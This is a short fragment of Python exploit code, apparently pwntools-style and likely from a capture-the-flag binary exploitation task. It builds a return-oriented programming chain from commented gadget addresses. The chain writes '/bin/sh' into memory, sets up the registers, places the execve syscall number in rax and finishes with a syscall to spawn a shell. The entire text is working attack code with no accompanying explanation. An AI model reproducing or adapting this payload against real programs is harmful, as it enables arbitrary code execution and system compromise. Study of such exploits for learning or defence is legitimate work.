payload = p64(0x415af6)
#0x0000000000415af6: pop rcx; ret; 
payload += p64(0x6e69622f)+p64(0x404f6f)
# 0x404f6f: pop rax ; retf 0x21
payload += p64(0x5270ed)+p32(0x407a9a)+p32(0x33)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x0000000000407a9a: add dword ptr [rax - 0x7d], ecx; ret; 
payload += p64(0x415af6)
# 0x0000000000415af6: pop rcx; ret; 
payload += p64(0x68662f)+p64(0x404f6f)
# 0x404f6f: pop rax ; retf 0x21
payload += p64(0x5270f1)+p32(0x407a9a)+p32(0x33)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x0000000000407a9a: add dword ptr [rax - 0x7d], ecx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x527070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x404f6f)
# 0x404f6f: pop rax ; retf 0x21
payload += p64(0x0)+p32(0x404f56)+p32(0x33)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x404f56: cdq ; retf
payload += p32(0x404f6f)+p32(0x33)
# 0x404f6f: pop rax ; retf 0x21
payload += p64(0x3b)+p32(0x521fdb)+p32(0x33)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x0000000000521fdb: syscall; 
payload += b''
